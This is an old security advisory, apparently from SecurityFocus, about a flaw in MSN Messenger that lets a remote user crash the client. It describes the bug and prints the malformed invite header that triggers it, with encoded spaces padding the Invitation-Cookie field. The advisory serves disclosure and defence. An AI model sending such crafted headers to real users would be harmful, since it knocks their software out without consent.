source: https://www.securityfocus.com/bid/4827/info Microsoft's MSN Messenger is an instant messenging client for Windows based machines, based on the Passport system. A vulnerability has been reported in some versions of MSN Messenger. Under some circumstances, it may be possible to crash the client when it receives a malformed invite request. By including a number of HTML-encoded space characters (%20) in the Invitation-Cookie field, and sending the header to a remote user, it is reportedly possible to crash a remote user's client. MIME-Version: 1.0 Content-Type: text/x-msmsgsinvite; charset=UTF-8 Application-Name: Remote Assistance Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc} Session-Protocol: SM1 Application-URL: http://www.microsoft.com Invitation-Command: INVITE Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}